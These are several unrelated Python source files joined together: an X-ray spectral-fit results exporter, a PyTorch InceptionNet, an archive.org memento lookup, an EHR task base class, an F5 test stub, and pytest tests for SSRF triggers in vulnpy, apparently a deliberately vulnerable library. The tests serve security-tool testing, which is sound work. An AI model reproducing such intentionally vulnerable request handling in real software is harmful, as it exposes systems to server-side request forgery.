    dof = get_fit_results().dof
    parvals = np.array(get_conf_results().parvals)
    parnames = np.array(get_conf_results().parnames)
    parmins = np.array(get_conf_results().parmins)
    parmaxes = np.array(get_conf_results().parmaxes)
    data_frame['chi2'][i] = chi
    data_frame['dof'][i] = dof
    data_frame['rchi2'][i] = chi/dof
    # Positional mapping of parameters (order follows the model expression).
    data_frame['NH'][i] = parvals[0]
    data_frame['minNH'][i] = parmins[0]
    data_frame['maxNH'][i] = parmaxes[0]
    data_frame["Tin/T0"][i] = parvals[1]
    data_frame["minTin"][i] = parmins[1]
    data_frame["maxTin"][i] = parmaxes[1]
    data_frame["dbb_norm"][i]= parvals[2]
    data_frame["mindbb_norm"][i] = parmins[2]
    data_frame["maxdbb_norm"][i] = parmaxes[2]
    data_frame["phoind/bb1kT/compkT"][i] = parvals[3]
    data_frame["minphoind"][i] = parmins[3]
    data_frame["maxphoind"][i] = parmaxes[3]
    data_frame["pow_norm"][i] = parvals[4]
    data_frame["minpow_norm"][i] = parmins[4]
    data_frame['maxpow_norm'][i] = parmaxes[4]
    if ((i == 1) or (i == 3)):
        # Extra gaussian-line parameters for the +g1 models.
        data_frame['g1lineE'][i] = parvals[5]
        data_frame['ming1lineE'][i] = parmins[5]
        data_frame['maxg1lineE'][i] = parmaxes[5]
        data_frame['g1sigma'][i] = parvals[6]
        data_frame['ming1sigma'][i] = parmins[6]
        data_frame['maxg1sigma'][i] = parmaxes[6]
        data_frame['g1norm'][i]=parvals[7]
        data_frame['ming1norm'][i]=parmins[7]
        data_frame['maxg1norm'][i]=parmaxes[7]
    if i == 4:
        # comptt model: re-map the positional parameters to their columns.
        data_frame["Tin/T0"][i] = parvals[1]
        data_frame["minTin"][i] = parmins[1]
        data_frame["maxTin"][i] = parmaxes[1]
        data_frame["phoind/bb1kT/compkT"][i] = parvals[2]
        data_frame["minphoind"][i] = parmins[2]
        data_frame["maxphoind"][i] = parmaxes[2]
        data_frame["comptau"][i] = parvals[3]
        data_frame["mincomptau"][i] = parmins[3]
        data_frame["maxcomptau"][i] = parmaxes[3]
        data_frame["pow_norm"][i] = parvals[4]
        data_frame["minpow_norm"][i] = parmins[4]
        data_frame["maxpow_norm"][i] = parmaxes[4]
    # now the flux :
    # For each model: run covariance, and only when all bounds are finite
    # and non-zero sample the 0.01-200 keV flux (68% confidence); any
    # sampling failure records zeros. Then plot the fit.
    # NOTE(review): callers pass "dbb" to create_plots but the component
    # tag checked there is "db1", so the diskbb component is presumably
    # never overplotted -- confirm.
    if i == 4:
        covar()
        cparmins = np.array(get_covar_results().parmins)
        cparmaxes = np.array(get_covar_results().parmaxes)
        if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
            try:
                sample_bol=sample_flux(comp1,0.01,200.0, num=1000, correlated=True,confidence=68)
                data_frame["total_flux"][i] = sample_bol[1][0]
                data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
                data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
            except:
                data_frame["total_flux"][i] = 0
                data_frame["mintotal_flux"][i] = 0
                data_frame["maxtotal_flux"][i] = 0
        create_plots(["comp1"], x_max, x_min, ymax, ymin,i)
    if i == 0:
        covar()
        cparmins = np.array(get_covar_results().parmins)
        cparmaxes = np.array(get_covar_results().parmaxes)
        if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
            try:
                sample_bol=sample_flux(db1+po1,0.01,200.0, num=1000, correlated=True,confidence=68)
                data_frame["total_flux"][i] = sample_bol[1][0]
                data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
                data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
            except:
                data_frame["total_flux"][i] = 0
                data_frame["mintotal_flux"][i] = 0
                data_frame["maxtotal_flux"][i] = 0
        create_plots(["dbb","po1"],x_max,x_min,ymax, ymin,i)
    if i == 1:
        covar()
        cparmins = np.array(get_covar_results().parmins)
        cparmaxes = np.array(get_covar_results().parmaxes)
        if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
            try:
                sample_bol=sample_flux(db1+po1+g1,0.01,200.0, num=1000, correlated=True,confidence=68)
                data_frame["total_flux"][i] = sample_bol[1][0]
                data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
                data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
            except:
                data_frame["total_flux"][i] = 0
                data_frame["mintotal_flux"][i] = 0
                data_frame["maxtotal_flux"][i] = 0
        create_plots(["dbb","po1","g1"],x_max,x_min,ymax, ymin,i)
    if i == 2:
        covar()
        cparmins = np.array(get_covar_results().parmins)
        cparmaxes = np.array(get_covar_results().parmaxes)
        if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
            try:
                sample_bol=sample_flux(db1+bb1,0.01,200.0, num=1000, correlated=True,confidence=68)
                data_frame["total_flux"][i] = sample_bol[1][0]
                data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
                data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
            except:
                data_frame["total_flux"][i] = 0
                data_frame["mintotal_flux"][i] = 0
                data_frame["maxtotal_flux"][i] = 0
        create_plots(["dbb","bb1"],x_max,x_min,ymax, ymin,i)
    if i == 3:
        covar()
        cparmins = np.array(get_covar_results().parmins)
        cparmaxes = np.array(get_covar_results().parmaxes)
        if (None in cparmins) == False and (None in cparmaxes) == False and (0 in cparmaxes) == False and (0 in cparmins) == False:
            try:
                sample_bol=sample_flux(db1+bb1+g1,0.01,200.0, num=1000, correlated=True,confidence=68)
                data_frame["total_flux"][i] = sample_bol[1][0]
                data_frame["mintotal_flux"][i] = sample_bol[1][1]-sample_bol[1][0]
                data_frame["maxtotal_flux"][i] = sample_bol[1][0]-sample_bol[1][2]
            except:
                data_frame["total_flux"][i] = 0
                data_frame["mintotal_flux"][i] = 0
                data_frame["maxtotal_flux"][i] = 0
        # str(i) here (plain i elsewhere); harmless since the index is only
        # ever interpolated into file names.
        create_plots(["dbb","bb1","g1"],x_max,x_min,ymax, ymin,str(i))
# Assemble the per-model results table and write it next to the spectra.
df = pd.DataFrame.from_dict(data_frame)
# Fix: transpose() returns a new frame -- the original discarded its
# result, so the files were written untransposed.
df = df.transpose()
df.to_excel(burst_folder+source_name+'_sp_res_'+str(bid)+'_pre_pers.xlsx')
# NOTE(review): '_pre_pres.csv' looks like a typo for '_pre_pers.csv';
# kept as-is in case downstream consumers rely on the existing name.
df.to_csv(burst_folder+source_name+'_sp_res_'+str(bid)+'_pre_pres.csv')
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 2 12:30:22 2021
@author: Admin
"""
import torch
import torch.nn as nn
from torchsummary import summary
class InceptionNet(nn.Module):
    """GoogLeNet-style network built from Inception blocks.

    NOTE(review): the final average pool uses a fixed 7x7 kernel, so the
    forward pass presumably assumes 224x224 inputs -- confirm with callers.
    """

    def __init__(self, in_channels = 3, num_classes = 1000):
        super(InceptionNet, self).__init__()
        # Stem: 7x7 conv, maxpool, 3x3 conv.
        self.conv1 = conv_block(in_channels = in_channels, out_channels=64, kernel_size=(7,7), stride = (2,2), padding = (3,3))
        self.pool = nn.MaxPool2d(kernel_size=(3,3), stride=(2,2), padding = (1,1))
        self.conv2 = conv_block(64,192, kernel_size=(3,3), stride=(1,1), padding=(1,1))
        # Inception_block(in, out_1x1, red_3x3, out_3x3, red_5x5, out_5x5, out_1x1pool)
        self.inception3a = Inception_block(192,64,96,128,16,32,32)
        self.inception3b = Inception_block(256,128,128,192,32,96,64)
        self.inception4a = Inception_block(480,192,96,208,16,48,64)
        self.inception4b = Inception_block(512,160,112,224,24,64,64)
        self.inception4c = Inception_block(512,128,128,256,24,64,64)
        self.inception4d = Inception_block(512,112,144,288,32,64,64)
        self.inception4e = Inception_block(528,256,160,320,32,128,128)
        self.inception5a = Inception_block(832,256,160,320,32,128,128)
        self.inception5b = Inception_block(832,384,192,384,48,128,128)
        self.avgpool = nn.AvgPool2d(kernel_size=7, stride = 1)
        self.dropout = nn.Dropout(0.4)
        # Bug fix: the classifier width was hard-coded to 1000, silently
        # ignoring the num_classes argument.
        self.fc = nn.Linear(1024, num_classes)

    def forward(self, x):
        """Run the network; returns (batch, num_classes) logits."""
        x = self.conv1(x)
        x = self.pool(x)
        x = self.conv2(x)
        x = self.pool(x)
        x = self.inception3a(x)
        x = self.inception3b(x)
        x = self.pool(x)
        x = self.inception4a(x)
        x = self.inception4b(x)
        x = self.inception4c(x)
        x = self.inception4d(x)
        x = self.inception4e(x)
        x = self.pool(x)
        x = self.inception5a(x)
        x = self.inception5b(x)
        x = self.avgpool(x)
        # Flatten to (batch, 1024) before dropout + classifier.
        x = x.reshape(x.shape[0], -1)
        x = self.dropout(x)
        x = self.fc(x)
        return x
class Inception_block(nn.Module):
    """One Inception module: four parallel branches concatenated on the
    channel axis.

    Branches: 1x1 conv | 1x1 reduce -> 3x3 conv | 1x1 reduce -> 5x5 conv |
    3x3 maxpool -> 1x1 conv. Output channels are the sum of
    out_1x1 + out_3x3 + out_5x5 + out_1x1pool.
    """

    def __init__(self, in_channels, out_1x1, red_3x3, out_3x3, red_5x5, out_5x5, out_1x1pool):
        super(Inception_block, self).__init__()
        self.branch1 = conv_block(in_channels, out_1x1, kernel_size=1)
        self.branch2 = nn.Sequential(
            conv_block(in_channels, red_3x3, kernel_size=1),
            conv_block(red_3x3, out_3x3, kernel_size=3, padding=1),
        )
        self.branch3 = nn.Sequential(
            conv_block(in_channels, red_5x5, kernel_size=1),
            conv_block(red_5x5, out_5x5, kernel_size=5, padding=2),
        )
        self.branch4 = nn.Sequential(
            nn.MaxPool2d(kernel_size=3, stride=1, padding=1),
            conv_block(in_channels, out_1x1pool, kernel_size=1),
        )

    def forward(self, x):
        """Apply all four branches and concatenate along channels."""
        branch_outputs = [
            branch(x)
            for branch in (self.branch1, self.branch2, self.branch3, self.branch4)
        ]
        return torch.cat(branch_outputs, 1)
class conv_block(nn.Module):
    """Conv2d -> BatchNorm2d -> ReLU building block.

    Extra keyword arguments (kernel_size, stride, padding, ...) are passed
    straight through to nn.Conv2d.
    """

    def __init__(self, in_channels, out_channels, **kwargs):
        super(conv_block, self).__init__()
        # Same registration order as before so state_dict layouts match.
        self.relu = nn.ReLU()
        self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, **kwargs)
        self.bn = nn.BatchNorm2d(out_channels)

    def forward(self, x):
        out = self.conv(x)
        out = self.bn(out)
        return self.relu(out)
if __name__ == '__main__':
    # Smoke test: requires a CUDA device and the torchsummary package.
    device = torch.device('cuda')
    x = torch.randn(3,3,224,224).to(device)
    model = InceptionNet().to(device)
    print(model(x).shape)
    print(summary(model,(3,224,224)))
|
import mock
import os
import pytest
from vulnpy.trigger import ssrf
from tests.trigger.base_test import BaseTriggerTest
class BaseSsrfTest(BaseTriggerTest):
    """All SSRF triggers catch their exceptions"""

    @property
    def exception_input(self):
        # No input provokes an uncaught exception from these triggers.
        return None

    def test_exception(self):
        # Deliberate no-op: presumably disables an inherited test that
        # expects the trigger to raise -- confirm against BaseTriggerTest.
        pass

    def test_exception_caught(self):
        # The trigger must swallow its own exception, never raising here.
        self.trigger_func(self.exception_input)
class BaseUrlopenTest(BaseSsrfTest):
    # (url, expected status) pair -- presumably consumed by tests in
    # BaseTriggerTest, which is defined elsewhere.
    @property
    def good_input(self):
        return "http://example.com", 200


class TestLegacyUrlopen(BaseUrlopenTest):
    @property
    def trigger_func(self):
        return ssrf.do_legacy_urlopen


class TestUrlopenStr(BaseUrlopenTest):
    @property
    def trigger_func(self):
        return ssrf.do_urlopen_str


class TestUrlopenObj(BaseUrlopenTest):
    @property
    def trigger_func(self):
        return ssrf.do_urlopen_obj
class BaseHttpconnectionUrlTest(BaseSsrfTest):
    # Trusted URL plus the status code the trigger is expected to yield.
    @property
    def good_input(self):
        return ssrf.TRUSTED_URL, 200


class TestHttpconnectionRequestUrl(BaseHttpconnectionUrlTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpconnection_request_url


class TestHttpconnectionPutrequestUrl(BaseHttpconnectionUrlTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpconnection_putrequest_url


class BaseHttpconnectionMethodTest(BaseSsrfTest):
    # Trusted HTTP method (the user-controlled value for these triggers).
    @property
    def good_input(self):
        return ssrf.TRUSTED_METHOD, 200


class TestHttpconnectionRequestMethod(BaseHttpconnectionMethodTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpconnection_request_method


class TestHttpconnectionPutrequestMethod(BaseHttpconnectionMethodTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpconnection_putrequest_method


class TestHttpconnectionInit(BaseSsrfTest):
    # Host name is the user-controlled value for the constructor trigger.
    @property
    def good_input(self):
        return ssrf.TRUSTED_HOST, 200

    @property
    def trigger_func(self):
        return ssrf.do_httpconnection_init
# HTTPS tests raise an internal exception because we haven't figured out how
# to properly mock the socket connection without crashing python inside of
# the ssl module. These tests do still call each trigger, however, so they're
# sufficient for unit testing purposes.
class BaseHttpsconnectionUrlTest(BaseSsrfTest):
    # EXCEPTION_CODE is expected here because the mocked socket cannot
    # complete a TLS handshake (see the comment block above).
    @property
    def good_input(self):
        return ssrf.TRUSTED_URL, ssrf.EXCEPTION_CODE


class TestHttpsconnectionRequestUrl(BaseHttpsconnectionUrlTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpsconnection_request_url


class TestHttpsconnectionPutrequestUrl(BaseHttpsconnectionUrlTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpsconnection_putrequest_url


class BaseHttpsconnectionMethodTest(BaseSsrfTest):
    @property
    def good_input(self):
        return ssrf.TRUSTED_METHOD, ssrf.EXCEPTION_CODE


class TestHttpsconnectionRequestMethod(BaseHttpsconnectionMethodTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpsconnection_request_method


class TestHttpsconnectionPutrequestMethod(BaseHttpsconnectionMethodTest):
    @property
    def trigger_func(self):
        return ssrf.do_httpsconnection_putrequest_method


class TestHttpsconnectionInit(BaseSsrfTest):
    @property
    def good_input(self):
        return ssrf.TRUSTED_HOST, ssrf.EXCEPTION_CODE

    @property
    def trigger_func(self):
        return ssrf.do_httpsconnection_init
@pytest.fixture(scope="class")
def unmock_connection():
    """
    Enable a real SSRF request for just one test.
    """
    # Setting this env var presumably disables the connection mocking used
    # by the base test class -- confirm against tests/trigger/base_test.py.
    with mock.patch.dict(
        os.environ, {"VULNPY_REAL_SSRF_REQUESTS": "any-nonzero-value"}
    ):
        yield
@pytest.mark.usefixtures("unmock_connection")
class TestUrlopenStrUnmocked(BaseUrlopenTest):
    # Same trigger as TestUrlopenStr, but run with the connection
    # mocking disabled (see the unmock_connection fixture).
    @property
    def trigger_func(self):
        return ssrf.do_urlopen_str
|
<filename>wayback.py
__author__ = "<NAME>"
__copyright__ = "Copyright 2017-2019, <NAME>"
__license__ = "apache-2.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
import re
import json
import os
import logging
import requests
import arrow
from time import sleep
import settings
# Module logger writing DEBUG-and-above to stderr.
logger = logging.getLogger("wayback")
logger.setLevel(10)  # 10 == logging.DEBUG
console_handler = logging.StreamHandler()
formatter = logging.Formatter(
    "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
from pprint import pprint  # NOTE(review): unused in the visible code
# Matches the "first memento" line of a Wayback timemap response and
# captures its URL and datetime.
RE_FIRST = re.compile(
    r"^\<(?P<url>[^>]+)\>; rel=\"first memento\"; datetime=\"(?P<datetime>[^\"]+).*$"
)
class FindWaybackURL(object):
    """Look up the oldest archive.org memento for a site path.

    run() queries the Wayback timemap for every historically possible URL
    of the path and keeps the oldest capture found; if none exists it asks
    archive.org to save the current page.
    """

    def __init__(self, path, category=""):
        self.path = path
        self.category = category
        # Start from "now"; lowered whenever an older memento is found.
        # NOTE(review): `arrow.utcnow().timestamp` is a property only on
        # arrow < 1.0; on arrow >= 1.0 it is a method and int() of it
        # fails -- confirm the pinned arrow version.
        self.epoch = int(arrow.utcnow().timestamp)
        self.oldest = ""

    def save_to_archiveorg(self):
        # Ask the Wayback Machine to capture both URL forms of this path.
        urls = [
            f"{settings.site.url}/{self.path}/",
            f"{settings.site.url}/{self.path}/index.html",
        ]
        for url in urls:
            logger.info("saving %s to archive.org ", url)
            # Response ignored: fire-and-forget save request.
            r = requests.get(f"https://web.archive.org/save/{url}")

    def possible_urls(self):
        """Return a de-duplicated, order-preserving list of candidate URLs.

        Covers the current domain, former domains, and former category
        layouts (dict keys are used as an insertion-ordered set).
        """
        q = {}
        q[f"http://{settings.site.name}/{self.path}/"] = True
        q[f"http://{settings.site.name}/{self.path}/index.html"] = True
        domains = settings.formerdomains + [settings.site.name]
        for domain in domains:
            q[f"http://{domain}/{self.path}/"] = True
            categories = []
            if self.category in settings.formercategories:
                categories = (
                    categories
                    + settings.formercategories[self.category]
                )
            for category in categories:
                q[f"http://{domain}/{category}/{self.path}/"] = True
                q[
                    f"http://{domain}/category/{category}/{self.path}/"
                ] = True
        return list(q.keys())

    def get_first_memento(self, url):
        """Return a nameddict with the first memento's epoch and URL.

        Returns None (implicitly) when the timemap request fails or no
        "first memento" line matches.
        """
        target = f"http://web.archive.org/web/timemap/link/{url}"
        logger.info("requesting %s", url)
        mementos = requests.get(target)
        if mementos.status_code == requests.codes.ok:
            if not len(mementos.text):
                logger.debug("empty memento response for %s", target)
            for memento in mementos.text.split("\n"):
                m = RE_FIRST.match(memento)
                if m:
                    r = settings.nameddict(
                        {
                            # NOTE(review): same arrow `.timestamp`
                            # property-vs-method caveat as in __init__.
                            "epoch": int(
                                arrow.get(
                                    m.group("datetime"),
                                    "ddd, DD MMM YYYY HH:mm:ss ZZZ",
                                )
                                .to("utc")
                                .timestamp
                            ),
                            "url": m.group("url"),
                        }
                    )
                    logger.info("found memento candidate: %s", r)
                    return r
                else:
                    # NOTE(review): logged once per non-matching timemap
                    # line, not once per URL -- possibly noisier than
                    # intended.
                    logger.debug(
                        "no first memento found at: %s", target
                    )
        else:
            logger.warning(
                "request failed: %s, status: %s, txt: %s",
                mementos,
                mementos.status_code,
                mementos.text,
            )

    def run(self):
        """Find the oldest memento across all candidate URLs.

        Side effects: updates self.epoch/self.oldest, and triggers an
        archive.org save when nothing was found.
        """
        l = self.possible_urls()
        logger.info("running archive.org lookup for %s", self.path)
        for url in l:
            maybe = self.get_first_memento(url)
            if maybe:
                if maybe.epoch < self.epoch:
                    self.epoch = maybe.epoch
                    self.oldest = maybe.url
            sleep(0.500)  # be polite to archive.org between requests
        if not len(self.oldest):
            logger.error("no memento found for %s", self.path)
            self.save_to_archiveorg()
        else:
            logger.info(
                "\t\toldest found memento for %s: %s :: %s",
                self.path,
                str(arrow.get(self.epoch)),
                self.oldest,
            )
|
# coding=utf-8
# Copyright 2021 Google Health Research.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Utilities to handle EHR predictive task."""
import abc
import copy
from typing import Any, Dict, List, Mapping, Optional, Union
from ehr_prediction_modeling import mask_manager
from ehr_prediction_modeling.tasks import mlp_task_layer
from ehr_prediction_modeling.tasks import task_data
from ehr_prediction_modeling.tasks import task_layers
from ehr_prediction_modeling.tasks import task_masks
from ehr_prediction_modeling.utils import batches
from ehr_prediction_modeling.utils import mask_utils
import tensorflow.compat.v1 as tf
from ehr_prediction_modeling import configdict
class Task(metaclass=abc.ABCMeta):
  """Interface for dealing with tasks.

  A Task bundles what is needed to train and evaluate one set of prediction
  targets: the label keys read from a batch, the task-specific output layer,
  and the train/eval loss masks, which are produced by a MaskManager.
  """

  # Short identifier for the task; prepended to eval mask names. Subclasses
  # override this.
  task_type = ""

  def __init__(self, config, label_keys: Optional[List[str]] = None):
    """Initializes the Task.

    Args:
      config: Task configuration; fields read here include eval_masks and
        (via other methods) name, loss_weight, train_mask, task_layer_sizes
        and time_since_event_hours_list.
      label_keys: Optional list of keys used to extract this task's labels
        from a batch. Defaults to an empty list.
    """
    self._config = config
    self.mask_manager = None
    # Rewrite the configured eval-mask names once up front: prepend
    # task_type and expand "since_event" masks per configured horizon.
    self._config.eval_masks = self._update_eval_mask_names_list(
        self._config.eval_masks)
    self._label_keys = label_keys if label_keys else []
    self._task_layer = task_layers.get_task_layer(config, self.num_targets)
    self._init_mask_manager()

  def _init_mask_manager(self) -> None:
    """Creates the MaskManager that builds this task's loss masks."""
    self.mask_manager = mask_manager.MaskManager(
        task_config=self._config,
        label_keys=self._label_keys,
        window_hours=self.window_hours,
        supported_train_masks=self._supported_train_masks,
        supported_eval_masks=self._supported_eval_masks,
    )

  @property
  @abc.abstractmethod
  def default_masks(self) -> List[str]:
    """A list of masks that are used in all this task's composite masks."""

  @property
  def _supported_train_masks(self) -> Dict[str, List[str]]:
    """Maps each supported train mask name to its component masks."""
    return {
        task_masks.Train.BASE:
            self.default_masks,
    }

  @property
  @abc.abstractmethod
  def _unformatted_supported_eval_masks(self) -> Mapping[str, List[str]]:
    """Returns mapping of supported eval masks without task_type prepended.

    Returns:
      Map the names of masks (without task_type prepended) available during
      evaluation to their components.
    """

  def _update_eval_mask_names_list(self, eval_masks: List[str]) -> List[str]:
    """Updates eval mask names to include type and expand hours since event.

    Args:
      eval_masks: Eval masks to update the names of.

    Returns:
      An updated list of eval mask names. See _update_eval_mask_names Returns
      for a complete description of how mask names are updated.
    """
    # Convert to a dict so the same update fn can be applied to a list.
    empty_values = [None] * len(eval_masks)
    eval_mask_dict = dict(zip(eval_masks, empty_values))
    updated_eval_masks = self._update_eval_mask_names(eval_mask_dict)
    return list(updated_eval_masks)

  def _update_eval_mask_names(
      self, eval_masks: Dict[str, Optional[List[str]]]
  ) -> Dict[str, Optional[List[str]]]:
    """Updates eval mask names to include type and expand hours since event.

    Args:
      eval_masks: Eval masks to update the names of.

    Returns:
      A dict of eval masks with the keys updated. Keys will have task_type
      added and any mask with 'since_event_eval' in the name will be expanded
      based on time_since_event_hours_list. For example, if since_event_eval
      mask is a key in eval_masks and config.time_since_event_hours_list =
      [24, 48], the resulting dict will have one entry for 24 hours after
      event and one entry for 48 hours after event, but no entry for the bare
      since_event_eval mask. If config.time_since_event_hours_list is empty,
      any since_event_eval mask will be removed.
    """
    since_event_masks = [
        mask_name for mask_name in eval_masks.keys()
        if task_masks.Eval.SINCE_EVENT in mask_name
    ]
    for mask_name in since_event_masks:
      # One expanded entry per configured horizon; when the list is empty
      # the bare since_event mask is simply dropped.
      for hours in self._config.get("time_since_event_hours_list", []):
        new_mask_name = mask_name.replace(
            task_masks.Eval.SINCE_EVENT,
            f"{hours}_{mask_utils.SINCE_EVENT_MASK_SUFFIX}")
        eval_masks[new_mask_name] = eval_masks[mask_name]
      del eval_masks[mask_name]
    return {
        mask_utils.get_unique_mask_name(self.task_type, mask_name): components
        for mask_name, components in eval_masks.items()
    }

  @property
  def _supported_eval_masks(self) -> Dict[str, List[str]]:
    """Returns mapping of all supported eval masks with task_type prepended.

    Expands since event masks to have one entry per time_since_event_hours_list.

    Returns:
      Map the names of masks (with task_type prepended) available during
      evaluation to their components.
    """
    unformatted_eval_masks = self._unformatted_supported_eval_masks
    return self._update_eval_mask_names(unformatted_eval_masks)

  @property
  def _all_supported_masks(self) -> Dict[str, List[str]]:
    # Union of train and eval masks (shallow copy so neither dict mutates).
    masks = copy.copy(self._supported_train_masks)
    masks.update(self._supported_eval_masks)
    return masks

  @property
  def layer(self) -> task_layers.TaskLayers:
    """The task-specific output layer."""
    return self._task_layer

  @property
  def name(self) -> str:
    """Task name from the config."""
    return self._config.name

  @property
  @abc.abstractmethod
  def prediction_task_type(self) -> str:
    """Returns one of the values defined in {types.TaskType}."""

  @abc.abstractmethod
  def get_label_dicts(
      self) -> Dict[str, Union[tf.FixedLenSequenceFeature, tf.FixedLenFeature]]:
    """Returns a dictionary of labels to tensors that are used for the task."""

  @property
  @abc.abstractmethod
  def num_targets(self) -> int:
    """Total number of targets for the task."""

  @property
  @abc.abstractmethod
  def target_names(self) -> List[str]:
    """Names of targets for the task."""

  @property
  @abc.abstractmethod
  def window_hours(self) -> List[int]:
    """The total number of time horizons.

    Note that this list possibly contains duplicated values, e.g. with the
    Labs task. It is because there are several labs with the same time
    horizons, corresponding to several different targets that may have
    different mask values (see mask_utils.TIME_CUTOFF_MASK).

    Returns:
      A list of the time horizons (in hours) of all the targets. If several
      targets have the same time horizon, the values are duplicated.
    """

  @abc.abstractmethod
  def _get_all_task_variables(
      self, batch: batches.TFBatch,
      model_output: tf.Tensor) -> task_data.TaskVariables:
    """Fetches all variables used by the task."""

  def _get_targets_and_masks(
      self, batch: batches.TFBatch) -> task_data.TaskVariables:
    """Builds targets plus train/eval masks without model predictions."""
    targets = self.get_targets(batch)
    train_loss_mask = self.get_train_mask(batch)
    eval_mask_dict = self.get_eval_mask_dict(batch)
    return task_data.TaskVariables(
        targets=targets,
        train_mask=train_loss_mask,
        eval_mask_dict=eval_mask_dict,
    )

  def get_task_variables(
      self, batch: batches.TFBatch,
      model_output: Union[tf.Tensor, None]) -> task_data.TaskVariables:
    """Computes variables for task.

    Args:
      batch: Either tf.NextQueuedSequenceBatch, containing a batch of data. Or
        batches.TFBatch
      model_output: Either Tensor, the output from the model, shape wnt [
        num_unroll, batch_size, ndim_model_output]. Or None

    Returns:
      task_data.TaskVariables with all the variables from this task.
    """
    if model_output is not None:
      return self._get_all_task_variables(batch, model_output)
    else:
      # No predictions available: only targets and masks can be built.
      return self._get_targets_and_masks(batch)

  def get_targets(self, batch: batches.TFBatch) -> tf.Tensor:
    """Stacks this task's label tensors from the batch."""
    return self._extract_labels(batch, self._label_keys)

  def get_train_mask(self, batch: batches.TFBatch) -> tf.Tensor:
    """Computes the mask to be used to mask the training loss.

    Args:
      batch: tf.NextQueuedSequenceBatch, containing a batch of data.

    Returns:
      Tensor, the loss mask to be used in training, in time-major
      shape wnct [num_unroll, batch_size, channels, num_targets].

    Raises:
      ValueError: if the configured train mask is not supported.
    """
    train_mask = self._config.get("train_mask", task_masks.Train.BASE)
    if train_mask not in self._supported_train_masks:
      raise ValueError(
          "Train mask {mask} is not supported".format(mask=train_mask))
    return self.mask_manager.get_masks([train_mask], batch)[train_mask]

  def get_eval_mask_dict(
      self, batch: batches.TFBatch) -> Dict[str, tf.Tensor]:
    """Computes the dict of loss masks to be used to mask evaluation.

    Args:
      batch: tf.NextQueuedSequenceBatch, containing a batch of data.

    Returns:
      dict of string mask name to Tensors, the loss masks to be used in
      evaluation, in time-major shape wnct [num_unroll, batch_size, channels,
      num_targets].

    Raises:
      ValueError: if any configured eval mask is not supported.
    """
    for eval_mask in self._config.eval_masks:
      if eval_mask not in self._supported_eval_masks:
        raise ValueError(
            "Eval mask {mask} is not supported".format(mask=eval_mask))
    return self.mask_manager.get_masks(
        self._config.eval_masks,
        batch,
    )

  @property
  def loss_weight(self) -> float:
    """Weight of this task's loss in the combined objective."""
    return self._config.loss_weight

  @property
  def eval_masks(self) -> List[str]:
    """Eval mask names (already expanded/prefixed in __init__)."""
    return self._config.eval_masks

  @property
  def task_layer_sizes(self) -> List[int]:
    # Copy so callers cannot mutate the config's list in place.
    return self._config.get("task_layer_sizes", []).copy()

  def _extract_labels(self, batch: batches.TFBatch,
                      label_keys: List[str]) -> tf.Tensor:
    """Extracts the labels denoted by label_keys from the data.

    Args:
      batch: tf.NextQueuedSequenceBatch, containing a batch of data.
      label_keys: list of keys used to extract labels from the batch.

    Returns:
      Tensor in time-major shape wnct
      [num_unroll, batch_size, channels, num_targets] with the labels for each
      key given in label_keys.
    """
    return tf.stack(
        [batch.sequences[label_key] for label_key in label_keys], axis=3)

  def get_hidden_layer(self) -> mlp_task_layer.HiddenTaskLayerType:
    """Returns the underlying modeling layer from this tasks layer."""
    return self.layer.get_hidden_layer()

  # pytype: disable=bad-return-type
  @classmethod
  @abc.abstractmethod
  def config(cls) -> configdict.ConfigDict:
    """Config creation for the task."""
  # pytype: enable=bad-return-type

  # pytype: disable=bad-return-type
  @classmethod
  @abc.abstractmethod
  def default_configs(cls) -> List[configdict.ConfigDict]:
    """Default task config."""
  # pytype: enable=bad-return-type
|
<filename>test/test_stats.py
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from pytest import symbols as symbol_data
import requests
requests.packages.urllib3.disable_warnings()
from f5.bigip import ManagementRoot
from f5_openstack_agent.lbaasv2.drivers.bigip import network_helper
from f5_openstack_agent.lbaasv2.drivers.bigip import ssl_profile
from f5_openstack_agent.lbaasv2.drivers.bigip import stat_helper
from f5_openstack_agent.lbaasv2.drivers.bigip import system_helper
class TestStats:
    """
    Test global stats used for calculating capacity score.
    Test assumes a BIG-IP with single load balancer in an under cloud
    environment using vxlan tunnels.
    """
